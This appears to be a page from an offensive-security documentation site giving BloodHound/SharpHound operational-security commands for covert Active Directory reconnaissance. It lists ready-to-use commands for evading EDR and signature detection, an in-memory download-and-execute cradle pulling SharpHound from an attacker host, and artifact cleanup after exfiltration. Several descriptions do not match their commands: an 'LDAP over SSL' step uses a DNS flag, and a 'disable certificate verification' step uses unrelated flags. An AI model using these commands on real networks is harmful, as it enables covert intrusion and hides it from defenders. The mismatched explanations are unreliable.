> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# OPSEC

> Operational security considerations and stealth techniques for BloodHound collection.

## SharpHound — Stealth Collection

Stealth mode — avoids noisy session and local admin enumeration.

```powershell theme={"dark"}
.\SharpHound.exe -c All --Stealth
```

DC-only collection — no lateral host enumeration, minimal noise.

```powershell theme={"dark"}
.\SharpHound.exe -c DCOnly
```

Exclude domain controllers from host enumeration.

```powershell theme={"dark"}
.\SharpHound.exe -c All --ExcludeDomainControllers
```

Limit LDAP queries per second.

```powershell theme={"dark"}
.\SharpHound.exe -c All --Throttle 1000 --Jitter 20
```

Randomize output filenames to avoid signature-based detection.

```powershell theme={"dark"}
.\SharpHound.exe -c All --RandomFilenames --NoSaveCache
```

Custom output directory.

```powershell theme={"dark"}
.\SharpHound.exe -c All --OutputDirectory C:\Windows\Temp --RandomFilenames
```

***

## SharpHound — In-Memory Execution

Load and run SharpHound entirely in memory (no disk drop).

```powershell theme={"dark"}
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -Stealth
```

```powershell theme={"dark"}
$data = (New-Object System.Net.WebClient).DownloadData('http://ATTACKER_IP/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-c All --Stealth".Split())
```

***

## SharpHound — Artifact Cleanup

Remove output files after exfil.

```powershell theme={"dark"}
Remove-Item C:\Windows\Temp\*.zip -Force
Remove-Item C:\Windows\Temp\*.json -Force
```

Remove SharpHound cache file.

```powershell theme={"dark"}
Remove-Item $env:USERPROFILE\AppData\Local\Temp\*.bin -Force
```

***

## BloodHound.py — Stealth Options

DC-only — no host enumeration, no SMB sessions.

```bash theme={"dark"}
bloodhound-python -u USER -p 'Password' -d domain.local -c DCOnly -ns DC01_IP
```

Use LDAP over SSL (port 636) to blend with encrypted traffic.

```bash theme={"dark"}
bloodhound-python -u USER -p 'Password' -d domain.local -c All -ns DC01_IP --dns-tcp
```

Disable certificate verification for LDAPS.

```bash theme={"dark"}
bloodhound-python -u USER -p 'Password' -d domain.local -c All -ns DC01_IP --disable-pooling --disable-autogc
```

***

## Detection Signatures to Avoid

Skip session enumeration (very noisy, triggers EDR).

```powershell theme={"dark"}
.\SharpHound.exe -c Group,LocalAdmin,ObjectProps,ACL,Trusts,RDP,DCOM,PSRemote
```

Avoid `NetSessionEnum` (logged by Defender / Sysmon Event 7045).

```powershell theme={"dark"}
.\SharpHound.exe -c DCOnly,ObjectProps,ACL
```

***

## Timing Recommendations

Run during business hours to blend with legitimate LDAP traffic.

```powershell theme={"dark"}
.\SharpHound.exe -c All --Stealth --Throttle 2000 --Jitter 30
```

Loop collection in short bursts to avoid sustained high-volume LDAP queries.

```powershell theme={"dark"}
.\SharpHound.exe -c DCOnly --Loop --LoopDuration 00:30:00 --LoopInterval 00:10:00
```

***

## References

* [SharpHound Flags — SpecterOps Docs](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481394564251-SharpHound-Community-Edition-Flags)
* [Detecting BloodHound — SpecterOps Blog](https://posts.specterops.io/bloodhound-versus-ransomware-a-defenders-guide-28147dedb73b)
* [BloodHound OPSEC — Compass Security](https://blog.compass-security.com/2022/11/bloodhound-opsec-what-you-should-know/)
